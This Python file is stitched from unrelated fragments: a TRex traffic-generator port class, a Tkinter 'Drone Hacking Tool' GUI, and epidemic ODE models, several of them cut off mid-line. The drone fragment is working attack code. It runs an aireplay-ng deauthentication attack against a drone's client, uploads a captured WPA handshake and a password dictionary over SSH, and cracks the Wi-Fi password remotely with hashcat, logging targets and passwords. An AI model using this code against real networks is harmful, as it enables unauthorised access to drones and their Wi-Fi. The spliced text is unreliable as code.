def __init__ (self, port_id, user, rpc, session_id, info):
    """
    Client-side view of a single TRex port.

    port_id    - numeric id of the port on the server
    user       - user name used for ownership
    rpc        - RPC layer exposing transmit / transmit_batch
    session_id - id of this client session
    info       - static port info dict (copied defensively)
    """
    self.port_id = port_id
    self.state = self.STATE_IDLE          # assumed until the first sync()
    self.service_mode = False
    self.handler = None                   # server ownership handler (None = not acquired)
    self.rpc = rpc
    self.transmit = rpc.transmit          # shortcuts to the RPC layer
    self.transmit_batch = rpc.transmit_batch
    self.user = user
    self.info = dict(info)                # defensive copy
    self.streams = {}                     # stream_id -> STLStream cache
    self.profile = None
    self.session_id = session_id
    self.status = {}                      # last status blob from the server
    self.port_stats = trex_stl_stats.CPortStats(self)
    self.next_available_id = 1            # next auto-allocated stream id
    self.tx_stopped_ts = None             # timestamp of last TX stop (RX drain logic)
    self.has_rx_streams = False           # True when any cached stream has flow stats
    self.owner = ''                       # owner as reported by the server
    self.last_factor_type = None          # last multiplier type (shown in the TUI)
    self.__attr = {}                      # port attributes, replaced atomically under attr_lock
    self.attr_lock = threading.Lock()
# decorator to verify port is up
def up(func):
def func_wrapper(*args, **kwargs):
port = args[0]
if not port.is_up():
return port.err("{0} - port is down".format(func.__name__))
return func(*args, **kwargs)
return func_wrapper
# owned
def owned(func):
def func_wrapper(*args, **kwargs):
port = args[0]
if not port.is_acquired():
return port.err("{0} - port is not owned".format(func.__name__))
return func(*args, **kwargs)
return func_wrapper
# decorator to check server is readable (port not down and etc.)
def writeable(func):
def func_wrapper(*args, **kwargs):
port = args[0]
if not port.is_acquired():
return port.err("{0} - port is not owned".format(func.__name__))
if not port.is_writeable():
return port.err("{0} - port is active, please stop the port before executing command".format(func.__name__))
return func(*args, **kwargs)
return func_wrapper
def err(self, msg):
    """Wrap *msg* into an RC_ERR result tagged with this port's id."""
    return RC_ERR("Port {0} : *** {1}".format(self.port_id, msg))

def ok(self, data = ""):
    """Return a successful RC_OK result carrying optional *data*."""
    return RC_OK(data)

def get_speed_bps (self):
    """Port line speed in bits/sec, derived from the Gbps attribute."""
    return (self.get_speed_gbps() * 1000 * 1000 * 1000)

def get_speed_gbps (self):
    """Port line speed in Gbps as last synced into the port attributes."""
    return self.__attr['speed']
def is_acquired(self):
return (self.handler != None)
def is_up (self):
    # link status as reported by the last attribute sync
    return self.__attr['link']['up']

def is_active(self):
    # active = anything keeping the port busy (TX, pause, or PCAP TX)
    return (self.state == self.STATE_TX ) or (self.state == self.STATE_PAUSE) or (self.state == self.STATE_PCAP_TX)

def is_transmitting (self):
    # transmitting = regular TX or PCAP replay
    return (self.state == self.STATE_TX) or (self.state == self.STATE_PCAP_TX)

def is_paused (self):
    return (self.state == self.STATE_PAUSE)

def is_writeable (self):
    # operations on port can be done on state idle or state streams
    return ((self.state == self.STATE_IDLE) or (self.state == self.STATE_STREAMS))

def get_owner (self):
    # when we hold the handler we are the owner; otherwise report the remote owner
    if self.is_acquired():
        return self.user
    else:
        return self.owner

def __allocate_stream_id (self):
    # hand out monotonically increasing stream ids
    id = self.next_available_id
    self.next_available_id += 1
    return id
# take the port
def acquire(self, force = False, sync_streams = True):
    """
    Take ownership of the port on the server.

    force        - steal the port even if owned by someone else
    sync_streams - also pull the server's stream table into the local cache
    """
    rc = self.transmit("acquire", {"port_id": self.port_id,
                                   "user": self.user,
                                   "session_id": self.session_id,
                                   "force": force})
    if not rc:
        return self.err(rc.err())
    # the returned handler proves ownership for subsequent commands
    self.handler = rc.data()
    return self.sync_streams() if sync_streams else self.ok()
# sync all the streams with the server
def sync_streams (self):
    """Replace the local stream cache with the server's stream table."""
    # drop the cache up-front (matches prior behavior even on RPC failure)
    self.streams = {}
    rc = self.transmit("get_all_streams", {"port_id": self.port_id})
    if rc.bad():
        return self.err(rc.err())
    self.streams = {int(sid): STLStream.from_json(js)
                    for sid, js in rc.data()['streams'].items()}
    return self.ok()
# release the port
def release(self):
    """Give up ownership of the port on the server and forget it locally."""
    rc = self.transmit("release", {"port_id": self.port_id,
                                   "handler": self.handler})
    if not rc.good():
        return self.err(rc.err())
    # ownership gone - clear the local handler/owner
    self.handler = None
    self.owner = ''
    return self.ok()
def sync(self):
    """Pull the full port status from the server and mirror it locally."""
    rc = self.transmit("get_port_status", {"port_id": self.port_id})
    if rc.bad():
        return self.err(rc.err())
    data = rc.data()
    # translate the server's textual state to the local state machine
    state_lookup = {"DOWN":    self.STATE_DOWN,
                    "IDLE":    self.STATE_IDLE,
                    "STREAMS": self.STATE_STREAMS,
                    "TX":      self.STATE_TX,
                    "PAUSE":   self.STATE_PAUSE,
                    "PCAP_TX": self.STATE_PCAP_TX}
    port_state = data['state']
    if port_state not in state_lookup:
        raise Exception("port {0}: bad state received from server '{1}'".format(self.port_id, port_state))
    self.state = state_lookup[port_state]
    self.owner = data['owner']
    self.next_available_id = int(data['max_stream_id']) + 1
    self.status = data
    # replace the attributes in a thread safe manner
    self.set_ts_attr(data['attr'])
    self.service_mode = data['service']
    return self.ok()
# add streams
@writeable
def add_streams (self, streams_list):
    """
    Attach one or more streams to the port.

    Phase 1 allocates ids and builds a name -> id lookup (names may be
    auto-derived from object identity); phase 2 resolves 'next stream'
    dependencies through that lookup and sends one batched RPC.
    Returns an aggregated RC; on success the local cache and port state
    are updated per stream.
    """
    # listify
    streams_list = listify(streams_list)
    lookup = {}
    # allocate IDs
    for stream in streams_list:
        # allocate stream id (explicit id wins over auto-allocation)
        stream_id = stream.get_id() if stream.get_id() is not None else self.__allocate_stream_id()
        if stream_id in self.streams:
            return self.err('Stream ID: {0} already exists'.format(stream_id))
        # name - fall back to the object's identity when unnamed
        name = stream.get_name() if stream.get_name() is not None else id(stream)
        if name in lookup:
            return self.err("multiple streams with duplicate name: '{0}'".format(name))
        lookup[name] = stream_id
    batch = []
    for stream in streams_list:
        name = stream.get_name() if stream.get_name() is not None else id(stream)
        stream_id = lookup[name]
        # resolve the 'next stream' dependency (-1 = no continuation)
        next_id = -1
        next = stream.get_next()
        if next:
            if not next in lookup:
                return self.err("stream dependency error - unable to find '{0}'".format(next))
            next_id = lookup[next]
        stream_json = stream.to_json()
        stream_json['next_stream_id'] = next_id
        params = {"handler": self.handler,
                  "port_id": self.port_id,
                  "stream_id": stream_id,
                  "stream": stream_json}
        cmd = RpcCmdData('add_stream', params, 'core')
        batch.append(cmd)
    rc = self.transmit_batch(batch)
    ret = RC()
    # cache only the streams the server actually accepted
    for i, single_rc in enumerate(rc):
        if single_rc.rc:
            stream_id = batch[i].params['stream_id']
            self.streams[stream_id] = streams_list[i].clone()
            ret.add(RC_OK(data = stream_id))
            self.has_rx_streams = self.has_rx_streams or streams_list[i].has_flow_stats()
        else:
            ret.add(RC(*single_rc))
    self.state = self.STATE_STREAMS if (len(self.streams) > 0) else self.STATE_IDLE
    return ret if ret else self.err(str(ret))
# remove stream from port
@writeable
def remove_streams (self, stream_id_list):
    """
    Detach the given stream ids from the port.

    Unknown ids are collected and reported as an error at the end, but
    the known ids are still removed first (partial success semantics).
    """
    # single element to list
    stream_id_list = listify(stream_id_list)
    # verify existence - split ids into known and unknown
    not_found = list_difference(stream_id_list, self.streams)
    found = list_intersect(stream_id_list, self.streams)
    batch = []
    for stream_id in found:
        params = {"handler": self.handler,
                  "port_id": self.port_id,
                  "stream_id": stream_id}
        cmd = RpcCmdData('remove_stream', params, 'core')
        batch.append(cmd)
    if batch:
        rc = self.transmit_batch(batch)
        # drop from the cache only what the server confirmed removed
        for i, single_rc in enumerate(rc):
            if single_rc:
                id = batch[i].params['stream_id']
                del self.streams[id]
        self.state = self.STATE_STREAMS if (len(self.streams) > 0) else self.STATE_IDLE
        # recheck if any RX stats streams present on the port
        self.has_rx_streams = any([stream.has_flow_stats() for stream in self.streams.values()])
        # did the batch send fail ?
        if not rc:
            return self.err(rc.err())
    # partially succeeded ?
    return self.err("stream(s) {0} do not exist".format(not_found)) if not_found else self.ok()
# remove all the streams
@writeable
def remove_all_streams (self):
    """Detach every stream from the port and reset the local cache/state."""
    rc = self.transmit("remove_all_streams", {"handler": self.handler,
                                              "port_id": self.port_id})
    if not rc:
        return self.err(rc.err())
    # empty cache -> port drops back to IDLE with no RX-stats streams
    self.streams = {}
    self.state = self.STATE_IDLE
    self.has_rx_streams = False
    return self.ok()
# get a specific stream
def get_stream (self, stream_id):
if stream_id in self.streams:
return self.streams[stream_id]
else:
return None
def get_all_streams (self):
    """Return the full stream cache (id -> stream). Note: not a copy."""
    return self.streams
@writeable
def start (self, mul, duration, force, mask, start_at_ts = 0):
    """
    Start transmitting on the port.

    mul         - multiplier descriptor dict ('type'/'value')
    duration    - seconds to transmit (server-side semantics)
    force       - force the start even on rate warnings
    mask        - core mask; None means all cores (MASK_ALL)
    start_at_ts - optional absolute start timestamp
    """
    if self.state == self.STATE_IDLE:
        return self.err("unable to start traffic - no streams attached to port")
    params = {"handler": self.handler,
              "port_id": self.port_id,
              "mul": mul,
              "duration": duration,
              "force": force,
              "core_mask": mask if mask is not None else self.MASK_ALL,
              'start_at_ts': start_at_ts}
    # must set this before to avoid race with the async response
    last_state = self.state
    self.state = self.STATE_TX
    rc = self.transmit("start_traffic", params)
    if rc.bad():
        # roll the optimistic state change back on failure
        self.state = last_state
        return self.err(rc.err())
    # save this for TUI
    self.last_factor_type = mul['type']
    return rc
# stop traffic
# with force ignores the cached state and sends the command
@owned
def stop (self, force = False):
    """Stop traffic on the port; no-op when already inactive unless *force*."""
    # if not active and not force - nothing to do
    if not self.is_active() and not force:
        return self.ok()
    params = {"handler": self.handler,
              "port_id": self.port_id}
    rc = self.transmit("stop_traffic", params)
    if rc.bad():
        return self.err(rc.err())
    self.state = self.STATE_STREAMS
    self.last_factor_type = None
    # timestamp for last tx - used by the RX-filter drain delay logic
    self.tx_stopped_ts = datetime.now()
    return self.ok()
# return True if port has any stream configured with RX stats
def has_rx_enabled (self):
    return self.has_rx_streams

# return true if rx_delay_ms has passed since the last port stop
def has_rx_delay_expired (self, rx_delay_ms):
    # NOTE(review): assert is stripped under python -O; consider raising instead
    assert(self.has_rx_enabled())
    # if active - it's not safe to remove RX filters
    if self.is_active():
        return False
    # either no timestamp present or time has already passed
    return not self.tx_stopped_ts or (datetime.now() - self.tx_stopped_ts) > timedelta(milliseconds = rx_delay_ms)
@writeable
def remove_rx_filters (self):
    """Remove the server-side RX stat filters; no-op when the port is IDLE."""
    # NOTE(review): assert is stripped under python -O; consider raising instead
    assert(self.has_rx_enabled())
    if self.state == self.STATE_IDLE:
        return self.ok()
    params = {"handler": self.handler,
              "port_id": self.port_id}
    rc = self.transmit("remove_rx_filters", params)
    if rc.bad():
        return self.err(rc.err())
    return self.ok()
@writeable
def set_l2_mode (self, | |
self.ssh_port_label_ssh_port_inputbox_frame.pack(side = "top", fill = "both", pady = 10)
self.ssh_user_name_label_ssh_user_name_inputbox_frame = tk.Frame(self)
self.ssh_user_name_label_ssh_user_name_inputbox_frame.config(background = "white")
self.ssh_user_name_label = tk.Label(self.ssh_user_name_label_ssh_user_name_inputbox_frame, background = "white", text = "SSH user name: ", font = self.controller.label_font)
self.ssh_user_name_label.pack(side = "left", anchor = "w")
self.ssh_user_name_inputbox = tk.Entry(self.ssh_user_name_label_ssh_user_name_inputbox_frame, background = "white", font = self.controller.label_font)
self.ssh_user_name_inputbox.pack(fill = "x")
self.ssh_user_name_label_ssh_user_name_inputbox_frame.pack(side = "top", fill = "both", pady = 10)
self.ssh_user_password_label_ssh_user_password_inputbox_frame = tk.Frame(self)
self.ssh_user_password_label_ssh_user_password_inputbox_frame.config(background = "white")
self.ssh_user_password_label = tk.Label(self.ssh_user_password_label_ssh_user_password_inputbox_frame, background = "white", text = "SSH user password: ", font = self.controller.label_font)
self.ssh_user_password_label.pack(side = "left", anchor = "w")
self.ssh_user_password_inputbox = tk.Entry(self.ssh_user_password_label_ssh_user_password_inputbox_frame, background = "white", font = self.controller.label_font)
self.ssh_user_password_inputbox.pack(fill = "x")
self.ssh_user_password_label_ssh_user_password_inputbox_frame.pack(side = "top", fill = "both", pady = 10)
self.footer_frame = tk.Frame(self)
self.footer_frame.config(background = "white")
self.progressbar = ttk.Progressbar(self.footer_frame, style="green.Horizontal.TProgressbar", orient = "horizontal", mode = "indeterminate")
self.progressbar.pack(side = "top", fill = "x")
self.info_label = tk.Label(self.footer_frame, background = "white", text = "Ready.", font = self.controller.info_font)
self.info_label.pack(side = "left", anchor = "sw", pady = 5)
try:
self.start_button_icon = tk.PhotoImage(file = current_path + "/data/gui_img/start_icon.png")
self.start_button = tk.Button(self.footer_frame, background = "white", text = "Start", image = self.start_button_icon, compound = "left",
command = lambda: self.check_user_input())
self.start_button.pack(side = "right", anchor = "se")
except: #If icon not found
self.start_button = tk.Button(self.footer_frame, background = "white", text = "Start",
command = lambda: self.check_user_input())
self.start_button.pack(side = "right", anchor = "se")
self.footer_frame.pack(side = "bottom", fill = "both")
def menubar(self, tool):
    """Build and return the window menu bar (Option + Help) for *tool*."""
    bar = tk.Menu(tool)
    # 'Option' menu - both entries are placeholders, kept disabled
    option_menu = tk.Menu(bar, tearoff = 0)
    option_menu.add_command(label = "Home", command = lambda: quit(), state="disable")
    option_menu.add_separator()
    option_menu.add_command(label = "Exit", command = lambda: quit(), state="disable")
    bar.add_cascade(label = "Option", menu = option_menu)
    # 'Help' menu - static informational popups
    help_menu = tk.Menu(bar, tearoff = 0)
    help_menu.add_command(label = "Page guide", command = lambda: messagebox.showinfo("Page Guide",
        "Crack the password through the remote server to improve the effectiveness of cracking a password.\n\nTo enjoy the faster password cracking effectiveness, please type in the remote server login information."))
    help_menu.add_command(label = "About", command = lambda: messagebox.showinfo("Drone Hacking Tool",
        "Code name: Barbary lion\nVersion: 1.1.2.111\n\nGroup member:\n<NAME>\n<NAME>\nDicky SHEK"))
    bar.add_cascade(label = "Help", menu = help_menu)
    return bar
def check_user_input(self):
    """
    Validate the SSH connection fields, then lock the form and launch
    the handshake-file validation on a worker thread.
    """
    self.get_user_type_in_ssh_ip = self.ssh_ip_inputbox.get()
    self.get_user_type_in_ssh_port = self.ssh_port_inputbox.get()
    self.get_user_type_in_ssh_user_name = self.ssh_user_name_inputbox.get()
    self.get_user_type_in_ssh_user_password = self.ssh_user_password_inputbox.get()
    if self.get_user_type_in_ssh_ip == "" or self.get_user_type_in_ssh_port == "" or self.get_user_type_in_ssh_user_name == "" or self.get_user_type_in_ssh_user_password == "":
        messagebox.showerror("Error", "You must fill in all the fields.")
    else:
        # (was a redundant elif that exactly mirrored the condition above)
        try:
            ipaddress.ip_address(self.get_user_type_in_ssh_ip)
            try:
                self.get_user_type_in_ssh_port_int = int(self.get_user_type_in_ssh_port)
                # BUG FIX: upper bound was 65353; valid TCP ports end at 65535
                if self.get_user_type_in_ssh_port_int < 0 or self.get_user_type_in_ssh_port_int > 65535:
                    if messagebox.showerror("Error", "Invalid port number."):
                        self.ssh_port_inputbox.delete(0, "end") #Clear inputbox string
                else:
                    # freeze the form while the background work runs
                    self.ssh_ip_inputbox.config(state = "disable")
                    self.ssh_port_inputbox.config(state = "disable")
                    self.ssh_user_name_inputbox.config(state = "disable")
                    self.ssh_user_password_inputbox.config(state = "disable")
                    self.progressbar.start()
                    self.info_label.config(text = "Please wait.")
                    self.start_button.config(state = "disable")
                    # BUG FIX: target must be the callable itself; the old code
                    # called the method synchronously and started a no-op thread
                    threading.Thread(target = self.four_way_handshake_file_validation).start()
            except ValueError:
                self.progressbar.stop()
                if messagebox.showerror("Error", "Invalid port number."):
                    self.ssh_port_inputbox.delete(0, "end") #Clear inputbox string
        except ValueError:
            if messagebox.showerror("Error", "Invalid IP address."):
                self.ssh_ip_inputbox.delete(0, "end") #Clear inputbox string
def four_way_handshake_file_validation(self):
    """
    Locate (or let the user pick) the converted .hccapx handshake file,
    optionally generate a password dictionary from a previously cracked
    password, log the event, and hand off to ssh_connect() on a thread.
    """
    # NOTE(review): the '<PASSWORD>' tokens below are anonymisation
    # placeholders left in the source - the original expressions are lost
    # and this file does not parse as-is; restore them before running.
    self.check_four_way_handshake_convert_file = Path(four_way_handshake_convert_file)
    if self.check_four_way_handshake_convert_file.is_file(): #Check "check_four_way_handshake_convert_file" is really exist
        self.four_way_handshake_file_localpath = four_way_handshake_convert_file
        self.four_way_handshake_convert_filename = self.four_way_handshake_file_localpath.replace(current_path + "/handshake/hashcat_convert_file/", '')
        self.four_way_handshake_file_remotepath = "/home/" + self.get_user_type_in_ssh_user_name + "/" + self.four_way_handshake_convert_filename
        try:
            # cracked_password_output may be undefined -> NameError caught below
            if cracked_password_output != "":
                self.info_label.config(text = "Waiting for user select.")
                if messagebox.askyesno("Create password dictionary", "Would you like to create a password dictionary to improve the effective of cracking password?"):
                    self.info_label.config(text = "Generating a password dictionary file.")
                    #password_dictionary_path_timestamp = time.strftime("%Y%m%d-%H%M%S") #Create a timestamp
                    password_dictionary_path = current_path + "/handshake/password_dictionary/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
                    changed_password_generator.passwordInsert(cracked_password_output, password_dictionary_path, True) #True is enable two insert
                    changed_password_generator.oneChange(cracked_password_output, password_dictionary_path)
                    changed_password_generator.twoChange(cracked_password_output, password_dictionary_path)
                    changed_password_generator.oneInsertoneChange(cracked_password_output, password_dictionary_path)
                    self.password_dictionary_file_localpath = password_dictionary_path
                    self.password_dictionary_file_remotepath = "/home/" + self.get_user_type_in_ssh_user_name + "/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
                    self.password_dictionary_filename = selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
                    self.password_dictionary = True
                    remote_server_timestamp = time.strftime("%Y/%m/%d-%H:%M:%S") #Create a timestamp
                    self.check_log_file = Path(current_path + "/data/hack_drone_log.csv")
                    if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist
                        target_BSSID_log = [selected_bssid]
                        channel_log = [selected_channel]
                        privacy_log = [selected_privacy]
                        password_log = [<PASSWORD>]
                        manufacturer_log = [matched_manufacturer]
                        client_BSSID_log = [selected_ap_client]
                        remote_server_timestamp_log = [remote_server_timestamp]
                        states_log = ["BSSID: " + selected_bssid + " password dictionary created. File save at:" + password_dictionary_path]
                        dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":<PASSWORD>, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log, "timestamp":remote_server_timestamp_log, "states":states_log})
                        dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ",", mode = "a", header = False) #Write log data to "drone_attack_log.csv"
                else:
                    self.password_dictionary = False
            else:
                pass
        except NameError:
            pass
        threading.Thread(target = self.ssh_connect).start()
    else: #Handshake file not found or missing
        try:
            get_four_way_handshake_convert_file = filedialog.askopenfilename(initialdir = current_path + "/handshake/hashcat_convert_file/", filetypes = [('hccapx files', '.hccapx')], title = "Select File")
            #print(get_four_way_handshake_convert_file)
            if get_four_way_handshake_convert_file == "":
                self.progressbar.stop()
                if messagebox.showerror("Error", "You must select one file."):
                    # re-enable the form so the user can retry
                    self.ssh_ip_inputbox.config(state = "normal")
                    self.ssh_port_inputbox.config(state = "normal")
                    self.ssh_user_name_inputbox.config(state = "normal")
                    self.ssh_user_password_inputbox.config(state = "normal")
                    self.start_button.config(state = "normal")
            else:
                self.four_way_handshake_file_localpath = get_four_way_handshake_convert_file
                self.four_way_handshake_convert_filename = get_four_way_handshake_convert_file.replace(current_path + "/handshake/hashcat_convert_file/", '')
                self.four_way_handshake_file_remotepath = "/home/" + self.get_user_type_in_ssh_user_name + "/" + self.four_way_handshake_convert_filename
                try:
                    # NOTE(review): this branch duplicates the dictionary-creation
                    # logic above - candidate for extraction into a shared helper
                    if cracked_password_output != "":
                        self.info_label.config(text = "Waiting for user select.")
                        if messagebox.askyesno("Create password dictionary", "Would you like to create a password dictionary to improve the effective of cracking password?"):
                            self.info_label.config(text = "Generating a password dictionary file.")
                            #password_dictionary_path_timestamp = time.strftime("%Y/%m/%d-%H%M%S") #Create a timestamp
                            password_dictionary_path = current_path + "/handshake/password_dictionary/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
                            changed_password_generator.passwordInsert(cracked_password_output, password_dictionary_path, True) #True is enable two insert
                            changed_password_generator.oneChange(cracked_password_output, password_dictionary_path)
                            changed_password_generator.twoChange(cracked_password_output, password_dictionary_path)
                            changed_password_generator.oneInsertoneChange(cracked_password_output, password_dictionary_path)
                            self.password_dictionary_file_localpath = password_dictionary_path
                            self.password_dictionary_file_remotepath = "/home/" + self.get_user_type_in_ssh_user_name + "/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
                            self.password_dictionary_filename = selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
                            self.password_dictionary = True
                            remote_server_timestamp = time.strftime("%Y/%m/%d-%H:%M:%S") #Create a timestamp
                            self.check_log_file = Path(current_path + "/data/hack_drone_log.csv")
                            if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist
                                target_BSSID_log = [selected_bssid]
                                channel_log = [selected_channel]
                                privacy_log = [selected_privacy]
                                password_log = [<PASSWORD>]
                                manufacturer_log = [matched_manufacturer]
                                client_BSSID_log = [selected_ap_client]
                                remote_server_timestamp_log = [remote_server_timestamp]
                                states_log = ["BSSID: " + selected_bssid + " password dictionary created. File save at:" + password_dictionary_path]
                                dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":<PASSWORD>, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log, "timestamp":remote_server_timestamp_log, "states":states_log})
                                dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ",", mode = "a", header = False) #Write log data to "drone_attack_log.csv"
                        else:
                            self.password_dictionary = False
                    else:
                        pass
                except NameError:
                    pass
                threading.Thread(target = self.ssh_connect).start()
        except AttributeError:
            self.progressbar.stop()
            if messagebox.showerror("Error", "You must select one file."):
                self.ssh_ip_inputbox.config(state = "normal")
                self.ssh_port_inputbox.config(state = "normal")
                self.ssh_user_name_inputbox.config(state = "normal")
                self.ssh_user_password_inputbox.config(state = "normal")
                self.start_button.config(state = "normal")
def ssh_connect(self):
if messagebox.askyesno("Wi-Fi Deauthentication", "Would you like to keep running deauthentication attack to prevent the client reconnect to the drone?"):
deauth_info = "echo " + sudo_password + " | sudo -S xterm -iconic -T 'deauthinfo' -hold -e 'aireplay-ng --deauth 0 -a " + selected_bssid + " -c " + selected_ap_client + " " + selected_interface + "'"
subprocess.Popen(deauth_info, stdout = subprocess.PIPE, shell = True)
self.wifi_deauthentication_states = True
try:
self.info_label.config(text = "Connecting to the target SSH server.")
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(self.get_user_type_in_ssh_ip, self.get_user_type_in_ssh_port, self.get_user_type_in_ssh_user_name, self.get_user_type_in_ssh_user_password, timeout = 10)
try:
self.info_label.config(text = "Transmission file to the target SSH server.")
sftp = client.open_sftp()
sftp.put(self.four_way_handshake_file_localpath, self.four_way_handshake_file_remotepath)
if self.password_dictionary == True:
sftp.put(self.password_dictionary_file_localpath, self.password_dictionary_file_remotepath)
self.info_label.config(text = "Successfully uploaded.")
except OSError:
self.progressbar.stop()
self.info_label.config(text = "Upload failed.")
messagebox.showerror("Error", "Failed to transmission file to the target SSH server.")
self.check_log_file = Path(current_path + "/data/hack_drone_log.csv")
if self.password_dictionary == True:
hashcat_command = "hashcat -a 0 -m 2500 " + self.four_way_handshake_convert_filename + " " + self.password_dictionary_filename + " --status --status-timer 1"
stdin, hashcat_running_status_return_stdout, stderr = client.exec_command(hashcat_command, get_pty = True) #get_pty > get pseudo terminal
else:
hashcat_command = "hashcat -a 3 -m 2500 " + self.four_way_handshake_convert_filename + " --status --status-timer 1"
stdin, hashcat_running_status_return_stdout, stderr = client.exec_command(hashcat_command, get_pty = True) #get_pty > get pseudo terminal
self.info_label.config(text = "Cracking password.")
for line in iter(hashcat_running_status_return_stdout.readline, ""):
print(line, end = "")
get_cracked_password = "<PASSWORD> 3 -m 2500 " + self.four_way_handshake_convert_filename + " --show" #Show crecked password
stdin, cracked_password_return_stdout, stderr = client.exec_command(get_cracked_password , get_pty = True)
for line in iter(cracked_password_return_stdout.readline, ""): #Print password
separator = ":"
get_cracked_wifi_password = separator.join(line.split(separator, 3)[-1:])
if "\r\n" in get_cracked_wifi_password:
cracked_wifi_password = get_cracked_wifi_password.strip("\r\n") #Remove trailing newline
#print(cracked_wifi_password)
elif "\n" in get_cracked_wifi_password:
cracked_wifi_password = get_cracked_wifi_password.strip("\n") #Remove trailing newline
elif "\r" in get_cracked_wifi_password:
cracked_wifi_password = get_cracked_wifi_password.strip("\r") #Remove trailing newline
else:
cracked_wifi_password = get_cracked_wifi_password
client.close() #Close SSH connection
if self.wifi_deauthentication_states == True:
find_xterm_aireplay_pid = "ps ax | grep 'xterm -iconic | |
self.labels = ['Susceptible', 'Exposed', 'Infectious']
self.colors = ['green', 'yellow', 'red']
def __repr__(self):
    """Readable dump of the SEIS state fractions and model parameters."""
    return f"Covid_SEIS(s={self.s}, e={self.e}, i={self.i})\n(lam={self.lam}, b={self.b}, k={self.k}, a={self.a}, mu={self.mu})"
def rhs(self, t, y):
    """
    SEIS right-hand side: derivatives of (s, e, i) at time t.
    """
    s, e, i = y
    ds = self.lam - self.b * s * i - self.mu * s + self.k * i
    de = self.b * s * i - (self.mu + self.a) * e
    di = self.a * e - (self.mu + self.k) * i
    return np.array([ds, de, di])
class MSEIR(covid):
    def __init__(self, lam, sigma, b, k, a, mu, **kwargs):
        """
        MSEIR compartment model (maternal immunity M -> S -> E -> I -> R).

        dm/dt = lam - sigma*m - mu*m
        ds/dt = sigma*m - mu*s - b*s*i
        de/dt = b*s*i - (mu + a)*e
        di/dt = a*e - (k + mu)*i
        dr/dt = k*i - mu*r

        Parameters
            lam   - birth rate of the total population
            sigma - rate of losing maternally derived immunity (M -> S)
            b     - interactions per individual per day
            k     - fraction of infectious recovering each day (0 < k < 1)
            a     - 1/a is the mean incubation period
            mu    - population decrease rate

        Optional keyword arguments: absolute populations M, S, E, I, R and total N.
        """
        super().__init__(b, k, **kwargs)
        self.lam = lam
        self.sigma = sigma
        self.a = a
        self.mu = mu
        # absolute compartment sizes (S and I come from the covid base class - not shown here)
        self.M = kwargs.get('M', 0)
        self.R = kwargs.get('R', 0)
        self.E = kwargs.get('E', 0)
        self.N = kwargs.get('N', self.S + self.I + self.R + self.E + self.M)
        assert self.S + self.I + self.R + self.E + self.M == self.N, 'M+S+E+I+R should equal to N'
        # normalised fractions form the ODE state
        self.m = self.M / self.N
        self.s = self.S / self.N
        self.i = self.I / self.N
        self.r = self.R / self.N
        self.e = self.E / self.N
        # initial state, plot labels and colors (positionally aligned with y0)
        self.y0 = np.array([self.m, self.s, self.e, self.i, self.r])
        self.labels = ['MDI', 'Susceptible', 'Exposed', 'Infectious', 'Removed']
        self.colors = ['grey', 'green', 'yellow', 'red', 'blue']

    def __repr__(self):
        """Readable dump of the state fractions and model parameters."""
        return f"Covid_MSEIR(m={self.m}, s={self.s}, e={self.e}, i={self.i}, r={self.r})\n(lam={self.lam}, sigma={round(self.sigma,4)}, b={self.b}, k={self.k}, a={round(self.a,4)}, mu={self.mu})"

    def rhs(self, t, y):
        """Right-hand side of the MSEIR ODE system for state y = (m, s, e, i, r)."""
        m, s, e, i, r = y
        dm = self.lam - self.sigma * m - self.mu * m
        ds = self.sigma * m - self.b * s * i - self.mu * s
        de = self.b * s * i - (self.mu + self.a) * e
        di = self.a * e - (self.mu + self.k) * i
        dr = self.k * i - self.mu * r
        return np.array([dm, ds, de, di, dr])
class MSEIRS(covid):
    def __init__(self, lam, sigma, b, k, a, mu, l, **kwargs):
        """
        init MSEIRS model parameters, [maternally_derived_immunity-susceptible-exposed-infectious-recovered-susceptible]
        dm / dt = lam - sigma * m - mu * m
        ds / dt = sigma * m + l * r - mu * s - b * s * i
        de / dt = b * s * i - (a + mu) * e
        di / dt = a * e - (k + mu) * i
        dr / dt = k * i - (l + mu) * r
        Parameter
            lam - birth rate of total population
            sigma - the rate of changing from maternally_derived_immunity to susceptible
            b - b is number of interactions per individual per day
            k - k is the fraction of infectious to recovered each day (0 < k < 1)
            a - 1/a is the mean incubation period of exponential distribution
            mu - population decrease rate
            l - temporary immunity R would become S, 1/l is the mean immunity period of exponential distribution
        Optional Parameter
            M - maternally-derived-immunity population
            S - susceptible population
            E - exposed population
            I - infectious population
            R - recovered population
            N - total population
        """
        super().__init__(b, k, **kwargs)
        # init model related parameters
        self.lam = lam
        self.sigma = sigma
        self.a = a
        self.mu = mu
        self.l = l
        self.M = kwargs.get('M', 0)
        self.R = kwargs.get('R', 0)
        self.E = kwargs.get('E', 0)
        self.N = kwargs.get('N', self.S + self.I + self.R + self.E + self.M)
        assert self.S + self.I + self.R + self.E + self.M == self.N, 'M+S+E+I+R should equal to N'
        # normalised fractions form the ODE state
        self.m = self.M / self.N
        self.s = self.S / self.N
        self.i = self.I / self.N
        self.r = self.R / self.N
        self.e = self.E / self.N
        # redefine self.y0, self.labels, self.colors (positionally aligned with y0)
        self.y0 = np.array([self.m, self.s, self.e, self.i, self.r])
        self.labels = ['MDI', 'Susceptible', 'Exposed', 'Infectious', 'Removed']
        self.colors = ['grey', 'green', 'yellow', 'red', 'blue']

    def __repr__(self):
        """
        redefine the model representation
        """
        return f"Covid_MSEIRS(m={self.m}, s={self.s}, e={self.e}, i={self.i}, r={self.r})\n" \
